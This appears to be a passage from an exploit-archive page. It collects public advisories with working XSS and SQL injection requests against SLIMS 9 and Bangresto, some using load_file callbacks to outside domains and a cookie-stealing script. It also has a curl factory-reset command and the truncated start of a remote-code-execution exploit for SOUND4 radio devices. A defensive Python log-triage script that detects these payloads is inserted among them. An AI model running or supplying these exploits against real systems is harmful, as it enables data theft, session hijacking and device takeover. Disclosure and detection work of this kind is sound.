<pre><code>## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.21.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit a very<br />dangerous web page or malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/mnpw30)<br /><br />## Time spent<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.1<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi<br /><br />## Description:<br />The manual insertion `point 4` appears to be vulnerable to SQL<br />injection attacks. The payload '+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'<br />was submitted in the manual insertion `point 4`.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (5179=5179) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND 'BcGE'='BcGE&membershipType=a'''+(select<br />load_file('\\\\c0dsife82nybqm59yrpe81r86zct0kobrzip5it7.oastify.com\\bjr'))+'&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'<br 
/>---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/zp75bx)<br /><br />## Time spent<br />`00:15:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit a<br />very dangerous web page or malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br 
/>Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1<br />Connection: close<br />Content-Length: 2<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/i20ipf)<br /><br />## Time spent<br />`01:35:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.19.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi<br /><br />## Description:<br />The manual insertion `point 5` appears to be vulnerable to SQL<br />injection attacks. The payload '+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'<br />was submitted in the manual insertion `point 5`.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (8839=8839) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND<br />'IzAa'='IzAa&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'<br />---<br />```<br /><br />## Reproduce:<br 
/>[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/jy5pql)<br /><br />## Time spent<br />`00:10:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server<br />## Author: nu11secur1ty<br />## Date: 12.19.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload t8xqv<script>alert(1)</script>uou2q was submitted in the<br />manual insertion `point 3`.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already authenticated users to visit a<br />very dangerous web page or malicious javascript exploit.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br /><br />```GET<br />GET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Cache-Control: max-age=0<br 
/>Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/5smxxm)<br /><br />## Time spent<br />`02:35:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.1/slims9_bulian-9.1.1.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi<br /><br />## Description:<br />The `class` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+'<br />was submitted in the class parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take information from all database columns of this<br />system by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select<br />load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''<br />RLIKE (SELECT (CASE WHEN (7860=7860) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''<br />ELSE 0x28 END)) AND<br />'xGIA'='xGIA&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi)<br /><br />## Proof and 
Exploit:<br />[href](https://streamable.com/3li3zp)<br /><br />## Time spent<br />`00:30:00`<br /><br />## Writing an exploit<br />`00:15:00`<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image<br />## Author: nu11secur1ty<br />## Date: 12.17.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1<br /><br />## Description:<br />The value of the `class` request parameter is copied into the HTML<br />document as plain text between tags.<br />The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in the<br />class parameter. This input was echoed unmodified in the application's<br />response.<br />The attacker can trick an authenticated user into visiting his page and<br />handing over very sensitive information about the system.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payloads:<br />0.0<br /><br />```GET<br />GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1<br />Connection: close<br /><br />```<br />0.1<br />```GET<br />GET 
/slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27<br />HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1<br />Connection: close<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ibdulr)<br /><br />## Time spent<br />`01:30:00`<br /><br /></code></pre>
<pre><code>## Title: Bangresto 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.16.2022<br />## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br />## Demo: https://axcora.my.id/bangrestoapp/start.php<br />## Software: https://github.com/mesinkasir/bangresto<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto<br /><br />## Description:<br />The `itemID` parameter appears to be vulnerable to SQL injection attacks.<br />The payload ' was submitted in the itemID parameter, and a database<br />error message was returned.<br />The attacker can steal all information from the database of this<br />application.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: itemID (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT<br />(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/moapnd)<br /><br />## Time spent<br />`00:30:00`<br /></code></pre>
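All of the SLIMS reports above and the Bangresto report ride on query-string parameters (`class`, `membershipType`, `collType`, `itemID`) that reach HTML output or a SQL statement unmodified, and the payloads arrive percent-encoded (the `%3c%61%20...` strings in the GET requests). The detection below is an added example, not code from nu11secur1ty or from the SLIMS or Bangresto projects: it pulls the request line out of an access-log entry, decodes each parameter until the value stops changing (so a double-encoded `%253C` is still seen as `<`), and flags the two indicator classes these advisories show, markup in a parameter value and `load_file(`/`UPDATEXML(` sub-queries. The log lines, client addresses, `callback.example` domain and the `/bangrestoapp/menu.php` path are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators drawn from the advisories on this page: a markup tag echoed
# through a parameter (reflected XSS), and MySQL sub-queries used for
# out-of-band (load_file) or error-based (UPDATEXML) data extraction.
TAG_RE = re.compile(r"<\s*/?[A-Za-z]")
SQL_RE = re.compile(r"\b(load_file|updatexml)\s*\(", re.IGNORECASE)

# Request line as it appears inside an Apache/nginx combined log entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that a
    double-encoded payload such as %253Cscript%253E is judged as <script>."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def triage_request_line(log_line):
    """Return a sorted list of (parameter, indicator) findings for one
    access-log line; an empty list means nothing matched."""
    m = REQ_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = set()
    # parse_qsl splits on the raw '&' and '=' first and removes one layer of
    # encoding; fully_decode takes care of any remaining layers.
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(value)
        if TAG_RE.search(decoded):
            findings.add((name, "html-tag"))
        if SQL_RE.search(decoded):
            findings.add((name, "sql-subquery"))
    return sorted(findings)


def triage_log(lines):
    """Map each flagged line index to its findings; clean lines are omitted."""
    return {i: f for i, line in enumerate(lines) if (f := triage_request_line(line))}


# Constructed sample log lines (not from the advisories or any real host);
# the payload shapes mirror the reports above, shortened.
SAMPLE_LOG = [
    # benign report request
    '203.0.113.5 - - [21/Dec/2022:10:00:00 +0000] "GET /slims9_bulian-9.2.2/admin/modules/'
    'reporting/customs/loan_by_class.php?reportView=true&year=2002&class=3A'
    '&membershipType=student&collType=reference HTTP/1.1" 200 4120',
    # reflected markup in class plus a load_file() sub-query in collType
    '203.0.113.7 - - [21/Dec/2022:10:00:05 +0000] "GET /slims9_bulian-9.2.2/admin/modules/'
    'reporting/customs/loan_by_class.php?reportView=true&year=2002'
    '&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%65%78%61%6d%70%6c%65%2e%63%6f%6d%2f%22%3e'
    '&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5c'
    'callback.example%5c%5cwtf%27))%2b%27 HTTP/1.1" 200 4120',
    # error-based UPDATEXML() in itemID (Bangresto shape; the path is constructed)
    '203.0.113.9 - - [16/Dec/2022:09:30:00 +0000] "GET /bangrestoapp/menu.php?itemID=(UPDATEXML('
    '2539,CONCAT(0x2e,0x7171767871,(SELECT(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 HTTP/1.1" 500 312',
    # double-encoded tag: one decode gives %3Cscript%3E, the second gives <script>
    '203.0.113.9 - - [16/Dec/2022:09:31:00 +0000] "GET /slims9_bulian-9.2.2/admin/modules/'
    'reporting/customs/loan_by_class.php?class=%253Cscript%253E HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    for i, findings in triage_log(SAMPLE_LOG).items():
        print(f"line {i}: {findings}")
```

This is a triage signal, not a blocking rule: `TAG_RE` will also fire on free text such as `a<b`, and the real fix in the application is output encoding for the echoed parameter and a prepared statement for the SQL path. Sorting the findings keeps the output stable for alert de-duplication.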
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (restorefactory.cgi) Unauthenticated Factory Reset<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The device allows unauthenticated attackers to visit the unprotected<br />/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory<br />default configuration. 
Once a POST request is made, the device will reboot<br />with its default settings allowing the attacker to bypass authentication<br />and take full control of the system.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5742<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \<br />> sleep 120<br /><br />#login admin:admin<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution<br />#<br />#<br /># Vendor: SOUND4 Ltd.<br /># Product web page: https://www.sound4.com | https://www.sound4.biz<br /># Affected version: FM/HD Radio Processing:<br /># Impact/Pulse/First (Version 2: 1.1/2.15)<br /># Impact/Pulse/First (Version 1: 2.1/1.69)<br /># Impact/Pulse Eco 1.16<br /># Voice Processing:<br /># BigVoice4 1.2<br /># BigVoice2 1.30<br /># Web-Audio Streaming:<br /># Stream 1.1/2.4.29<br /># Watermarking:<br /># WM2 (Kantar Media) 1.11<br />#<br /># Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br /># stereo parts of the signal are processed separately to obtain perfect<br /># consistency in terms of both sound and level. Therefore, in moving<br /># reception, when the FM receiver switches from stereo to mono and back to<br /># stereo, the sound variations and changes in level are reduced by over 90%.<br /># In the SOUND4 IMPACT processing chain, the stereo expander can be used<br /># substantially without any limitations.<br />#<br /># With its advanced functionalities and impressive versatility, SOUND4<br /># PULSE gives clients the ultimate price - performance ratio, providing<br /># much more than just a processor. Flexible and powerful, it ensures perfect<br /># sound quality and full compatibility with radio broadcasting standards<br /># and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br />#<br /># SOUND4 FIRST provides all the most important functionalities you need<br /># in an FM/HD processor and sets the bar high both in terms of performance<br /># and affordability. Designed to deliver a sound of uncompromising quality,<br /># this tool gives you 2-band processing, a digital stereo generator and an<br /># IMPACT Clipper.<br />#<br /># Desc: SOUND4 products suffer from an unauthenticated remote code execution<br /># vulnerability. 
An attacker can exploit this vulnerability by abusing the<br /># firmware upgrade/upload functionality, which contains a path traversal flaw.<br /># This allows the attacker to arbitrarily write a malicious file to a location<br /># on the system with www-data permissions, which can be executed to gain unauthorized<br /># access.<br /># ---------------------------------------------------------------------------<br /># Starting handler on port 6161.<br /># Writing callback file...<br /># Connection from 192.168.1.137:58670<br /># You got shell.<br /># id<br /># uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /># exit<br /># *** Connection closed by remote host ***<br /># ---------------------------------------------------------------------------<br />#<br /># Tested on: Apache/2.4.25 (Unix)<br /># OpenSSL/1.0.2k<br /># PHP/7.1.1<br /># GNU/Linux 5.10.43 (armv7l)<br /># GNU/Linux 4.9.228 (armv7l)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># Macedonian Information Security Research and Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5741<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php<br />#<br />#<br /># 26.09.2022<br />#<br />#<br /><br />import ipaddress as irukandji#-- -----------------------------<br 